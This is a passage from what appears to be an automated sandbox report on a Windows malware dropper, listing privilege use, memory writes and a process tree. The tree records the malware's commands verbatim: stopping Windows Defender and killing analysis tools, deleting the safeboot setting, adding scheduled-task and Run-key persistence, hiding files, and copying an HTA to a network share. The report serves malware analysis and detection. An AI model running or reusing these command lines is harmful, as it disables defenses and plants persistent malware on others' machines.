description pid Process Token: SeIncreaseQuotaPrivilege 4844 VLC1.EXE Token: SeSecurityPrivilege 4844 VLC1.EXE Token: SeTakeOwnershipPrivilege 4844 VLC1.EXE Token: SeLoadDriverPrivilege 4844 VLC1.EXE Token: SeSystemProfilePrivilege 4844 VLC1.EXE Token: SeSystemtimePrivilege 4844 VLC1.EXE Token: SeProfSingleProcessPrivilege 4844 VLC1.EXE Token: SeIncBasePriorityPrivilege 4844 VLC1.EXE Token: SeCreatePagefilePrivilege 4844 VLC1.EXE Token: SeBackupPrivilege 4844 VLC1.EXE Token: SeRestorePrivilege 4844 VLC1.EXE Token: SeShutdownPrivilege 4844 VLC1.EXE Token: SeDebugPrivilege 4844 VLC1.EXE Token: SeSystemEnvironmentPrivilege 4844 VLC1.EXE Token: SeChangeNotifyPrivilege 4844 VLC1.EXE Token: SeRemoteShutdownPrivilege 4844 VLC1.EXE Token: SeUndockPrivilege 4844 VLC1.EXE Token: SeManageVolumePrivilege 4844 VLC1.EXE Token: SeImpersonatePrivilege 4844 VLC1.EXE Token: SeCreateGlobalPrivilege 4844 VLC1.EXE Token: 33 4844 VLC1.EXE Token: 34 4844 VLC1.EXE Token: 35 4844 VLC1.EXE Token: 36 4844 VLC1.EXE Token: SeDebugPrivilege 5976 WINDOWS SECURITY NANO.EXE Token: SeDebugPrivilege 1076 powershell.exe Token: SeIncreaseQuotaPrivilege 5164 msdcsc.exe Token: SeSecurityPrivilege 5164 msdcsc.exe Token: SeTakeOwnershipPrivilege 5164 msdcsc.exe Token: SeLoadDriverPrivilege 5164 msdcsc.exe Token: SeSystemProfilePrivilege 5164 msdcsc.exe Token: SeSystemtimePrivilege 5164 msdcsc.exe Token: SeProfSingleProcessPrivilege 5164 msdcsc.exe Token: SeIncBasePriorityPrivilege 5164 msdcsc.exe Token: SeCreatePagefilePrivilege 5164 msdcsc.exe Token: SeBackupPrivilege 5164 msdcsc.exe Token: SeRestorePrivilege 5164 msdcsc.exe Token: SeShutdownPrivilege 5164 msdcsc.exe Token: SeDebugPrivilege 5164 msdcsc.exe Token: SeSystemEnvironmentPrivilege 5164 msdcsc.exe Token: SeChangeNotifyPrivilege 5164 msdcsc.exe Token: SeRemoteShutdownPrivilege 5164 msdcsc.exe Token: SeUndockPrivilege 5164 msdcsc.exe Token: SeManageVolumePrivilege 5164 msdcsc.exe Token: SeImpersonatePrivilege 5164 msdcsc.exe Token: SeCreateGlobalPrivilege 5164 msdcsc.exe Token: 33 5164 msdcsc.exe Token: 34 5164 msdcsc.exe Token: 35 5164 msdcsc.exe Token: 36 5164 msdcsc.exe Token: SeDebugPrivilege 1728 powershell.exe Token: SeDebugPrivilege 5740 powershell.exe Token: SeDebugPrivilege 5636 powershell.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeIncreaseQuotaPrivilege 2912 msdcsc.exe Token: SeSecurityPrivilege 2912 msdcsc.exe Token: SeTakeOwnershipPrivilege 2912 msdcsc.exe Token: SeLoadDriverPrivilege 2912 msdcsc.exe Token: SeSystemProfilePrivilege 2912 msdcsc.exe Token: SeSystemtimePrivilege 2912 msdcsc.exe Token: SeProfSingleProcessPrivilege 2912 msdcsc.exe Token: SeIncBasePriorityPrivilege 2912 msdcsc.exe Token: SeCreatePagefilePrivilege 2912 msdcsc.exe Token: SeBackupPrivilege 2912 msdcsc.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 8 JOKE.EXE 4580 JOKE2.EXE 5164 msdcsc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5948 wrote to memory of 2960 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 87 PID 5948 wrote to memory of 2960 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 87 PID 5948 wrote to memory of 2960 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 87 PID 5948 wrote to memory of 1592 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 88 PID 5948 wrote to memory of 1592 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 88 PID 5948 wrote to memory of 1592 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 88 PID 5948 wrote to memory of 744 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 89 PID 5948 wrote to memory of 744 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 89 PID 5948 wrote to memory of 744 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 89 PID 5948 wrote to memory of 5864 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 90 PID 5948 wrote to memory of 5864 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 90 PID 5948 wrote to memory of 5864 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 90 PID 5948 wrote to memory of 8 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 91 PID 5948 wrote to memory of 8 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 91 PID 5948 wrote to memory of 8 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 91 PID 5948 wrote to memory of 4580 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 92 PID 5948 wrote to memory of 4580 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 92 PID 5948 wrote to memory of 4580 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 92 PID 1592 wrote to memory of 4804 1592 FILE5.EXE 93 PID 1592 wrote to memory of 4804 1592 FILE5.EXE 93 PID 1592 wrote to memory of 4804 1592 FILE5.EXE 93 PID 5948 wrote to memory of 4660 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 94 PID 5948 wrote to memory of 4660 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 94 PID 5948 wrote to memory of 4660 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 94 PID 5948 wrote to memory of 4740 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 95 PID 5948 wrote to memory of 4740 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 95 PID 5948 wrote to memory of 4740 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 95 PID 2960 wrote to memory of 4756 2960 WScript.exe 96 PID 2960 wrote to memory of 4756 2960 WScript.exe 96 PID 2960 wrote to memory of 4756 2960 WScript.exe 96 PID 1592 wrote to memory of 4844 1592 FILE5.EXE 97 PID 1592 wrote to memory of 4844 1592 FILE5.EXE 97 PID 1592 wrote to memory of 4844 1592 FILE5.EXE 97 PID 5948 wrote to memory of 972 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 98 PID 5948 wrote to memory of 972 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 98 PID 5948 wrote to memory of 972 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 98 PID 5948 wrote to memory of 4992 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 100 PID 5948 wrote to memory of 4992 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 100 PID 5948 wrote to memory of 4992 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 100 PID 1592 wrote to memory of 2800 1592 FILE5.EXE 101 PID 1592 wrote to memory of 2800 1592 FILE5.EXE 101 PID 1592 wrote to memory of 2800 1592 FILE5.EXE 101 PID 744 wrote to memory of 5312 744 WScript.exe 102 PID 744 wrote to memory of 5312 744 WScript.exe 102 PID 744 wrote to memory of 5312 744 WScript.exe 102 PID 5864 wrote to memory of 6100 5864 WScript.exe 104 PID 5864 wrote to memory of 6100 5864 WScript.exe 104 PID 5864 wrote to memory of 6100 5864 WScript.exe 104 PID 1592 wrote to memory of 5976 1592 FILE5.EXE 106 PID 1592 wrote to memory of 5976 1592 FILE5.EXE 106 PID 1592 wrote to memory of 5976 1592 FILE5.EXE 106 PID 5948 wrote to memory of 2952 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 111 PID 5948 wrote to memory of 2952 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 111 PID 5948 wrote to memory of 2952 5948 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 111 PID 744 wrote to memory of 5740 744 WScript.exe 114 PID 744 wrote to memory of 5740 744 WScript.exe 114 PID 744 wrote to memory of 5740 744 WScript.exe 114 PID 4660 wrote to memory of 2176 4660 LEGIT_SOFTWARE1.EXE 115 PID 4660 wrote to memory of 2176 4660 LEGIT_SOFTWARE1.EXE 115 PID 744 wrote to memory of 1076 744 WScript.exe 118 PID 744 wrote to memory of 1076 744 WScript.exe 118 PID 744 wrote to memory of 1076 744 WScript.exe 118 PID 4844 wrote to memory of 864 4844 VLC1.EXE 119 PID 4844 wrote to memory of 864 4844 VLC1.EXE 119 -
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 4596 attrib.exe 3604 attrib.exe 1184 attrib.exe 4884 attrib.exe 2896 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe"C:\Users\Admin\AppData\Local\Temp\9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5948 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EXECUTION.JS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4756
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵
- System Location Discovery: System Language Discovery
PID:5652
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4676
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5124
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5948
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:3164
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:3056
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2236
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1716
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2328
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:6036
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:1360
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2616
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5232
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:3204
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4384
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4740
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:2900
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:4956
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sysproc.js C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5312
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\AppData\Roaming\winupdate.hta3⤵PID:5340
-
-
-
C:\Users\Admin\AppData\Local\Temp\FILE5.EXE"C:\Users\Admin\AppData\Local\Temp\FILE5.EXE"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE"C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4804
-
-
C:\Program Files (x86)\VLC1.EXE"C:\Program Files (x86)\VLC1.EXE"3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)\VLC1.EXE" +s +h4⤵PID:864
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\VLC1.EXE" +s +h5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)" +s +h4⤵
- System Location Discovery: System Language Discovery
PID:264 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)" +s +h5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3604
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad4⤵PID:5340
-
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
-
C:\Program Files (x86)\WINDOWS DEFENDER.EXE"C:\Program Files (x86)\WINDOWS DEFENDER.EXE"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2800 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
PID:5516 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:5532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6002.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
PID:5068 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:1208
-
-
C:\Users\Admin\AppData\Roaming\csrss.exe"C:\Users\Admin\AppData\Roaming\csrss.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1796
-
-
-
-
C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE"C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:5976
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FINDM10E.VBS"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:744 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Windows\Temp\svchost_533423.exe3⤵
- System Location Discovery: System Language Discovery
PID:5312 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Windows\Temp\svchost_533423.exe4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4596
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Service WinDefend -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5740
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name taskmgr.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name cmd.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name regedit.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5636
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name procexp.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Stop-Process -Name processhacker.exe -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5724
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /deletevalue {current} safeboot3⤵
- System Location Discovery: System Language Discovery
PID:2804
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power /v HiberbootEnabled /t REG_DWORD /d 0 /f3⤵PID:4964
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power /v HiberbootEnabled /t REG_DWORD /d 0 /f4⤵
- Modifies registry key
PID:828
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cipher /e /s:C:\Windows\Temp\3⤵PID:3996
-
C:\Windows\SysWOW64\cipher.execipher /e /s:C:\Windows\Temp\4⤵PID:1276
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Local\findme_579518.exe3⤵PID:6024
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Users\Admin\AppData\Local\findme_579518.exe4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4884
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Users\Admin\AppData\Local\findme_579518.exe3⤵
- System Location Discovery: System Language Discovery
PID:4548
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INSTALLE10R.VBS"2⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5864 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c attrib +s +h C:\Users\Public\Documents\winservice_533423.exe3⤵
- System Location Discovery: System Language Discovery
PID:6100 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Users\Public\Documents\winservice_533423.exe4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2896
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\JOKE.EXE"C:\Users\Admin\AppData\Local\Temp\JOKE.EXE"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:8
-
-
C:\Users\Admin\AppData\Local\Temp\JOKE2.EXE"C:\Users\Admin\AppData\Local\Temp\JOKE2.EXE"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4580
-
-
C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4863.tmp\4864.tmp\4865.bat C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE1.EXE"3⤵
- Checks computer location settings
- Modifies registry class
PID:2176 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msgbx.vbs"4⤵PID:5704
-
-
C:\Windows\system32\net.exenet stop "WSearch"4⤵PID:3004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WSearch"5⤵PID:4748
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "START PAGE" /d "https://watchfurry4k.com"4⤵
- Modifies Internet Explorer settings
PID:1604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4740 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4864.tmp\4864.tmp\4865.bat C:\Users\Admin\AppData\Local\Temp\LEGIT_SOFTWARE2.EXE"3⤵PID:756
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:436
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4956
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:3676
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:5392
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:2940
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:2404
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4996
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:3220
-
-
C:\Windows\system32\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:5704
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LOL.VBS"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:972 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy C:\Users\Admin\AppData\Roaming\sys32.hta \\IDKMAN\C$\Users\Public\sys32.hta3⤵PID:5180
-
-
-
C:\Users\Admin\AppData\Local\Temp\SENDE2R.EXE"C:\Users\Admin\AppData\Local\Temp\SENDE2R.EXE"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4992 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"3⤵
- Executes dropped EXE
PID:2496 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3088 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"5⤵
- Executes dropped EXE
PID:2100 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1000 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"7⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3188 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:5708 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:5780 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"10⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5464 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:5664 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"12⤵
- Executes dropped EXE
PID:4400 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"13⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2392 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3824 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"15⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3204 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"16⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5284 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"17⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2232 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"18⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5664 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"19⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:828 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"20⤵
- Checks computer location settings
- Executes dropped EXE
PID:5552 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"21⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:4384 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"22⤵
- Checks computer location settings
- Executes dropped EXE
PID:2676 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"23⤵
